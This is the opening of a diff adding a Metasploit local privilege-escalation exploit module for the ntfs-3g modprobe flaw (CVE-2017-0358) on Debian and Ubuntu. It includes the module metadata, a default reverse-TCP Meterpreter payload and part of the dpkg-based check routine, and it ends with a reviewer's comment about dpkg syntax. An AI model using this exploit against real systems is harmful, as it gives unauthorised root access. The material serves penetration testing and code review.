modules/exploits/linux/local/ntfs3g_priv_esc.rb

```diff
@@ -0,0 +1,469 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Local
+  Rank = GoodRanking
+
+  include Msf::Exploit::EXE
+  include Msf::Post::File
+  include Msf::Exploit::FileDropper
+
+  def initialize(info={})
+    super( update_info( info, {
+        'Name'          => 'Debian/Ubuntu ntfs-3g Local Privilege Escalation',
+        'Description'   => %q{
+          ntfs-3g mount helper in Ubuntu 16.04, 16.10, Debian 7, 8, and possibly 9 does not properly sanitize the environment when executing modprobe.
+          This can be abused to load a kernel module and execute a binary payload as the root user.
+        },
+        'License'       => MSF_LICENSE,
+        'Author'        =>
+          [
+            'jannh@google.com',                    # discovery
+            'h00die <mike@shorebreaksecurity.com>' # metasploit module
+          ],
+        'Platform'      => [ 'linux' ],
+        'Arch'          => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes'  => [ 'shell', 'meterpreter' ],
+        'References'    =>
+          [
+            [ 'CVE', '2017-0358' ],
+            [ 'EDB', '41356' ],
+            [ 'URL', 'https://bugs.chromium.org/p/project-zero/issues/detail?id=1072' ]
+          ],
+        'Targets'       =>
+          [
+            [ 'Linux x86',       { 'Arch' => ARCH_X86 } ],
+            [ 'Linux x64',       { 'Arch' => ARCH_X64 } ]
+          ],
+        'DefaultOptions' =>
+          {
+            'payload' => 'linux/x64/mettle/reverse_tcp',
+            'PrependFork' => true,
+            },
+        'DefaultTarget' => 1,
+        'DisclosureDate' => 'Jan 05 2017',
+        'Privileged'     => true
+      }
+      ))
+    register_options([
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ], self.class)
+  end
+
+  def check
+
+    # check if linux headers were installed on Debian (not ubuntu). The 'common' headers won't work.
+    def headers_installed?()
+      output = cmd_exec('dpkg -l | grep \'^ii\' | grep linux-headers.*[^common]{7}')
+      if output
+        if output.include?('linux-headers')
+          return true
+        else
+          print_error('Linux kernel headers not available, compiling will fail.')
+          return false
+        end
+      end
+      false
+    end
+
+    output = cmd_exec('dpkg -l | grep \'^ii\' | grep ntfs-3g')
```

Comment:
`dpkg -l` supports patterns, it's possible to use `dpkg -l ntfs-3g | grep '^ii'` instead.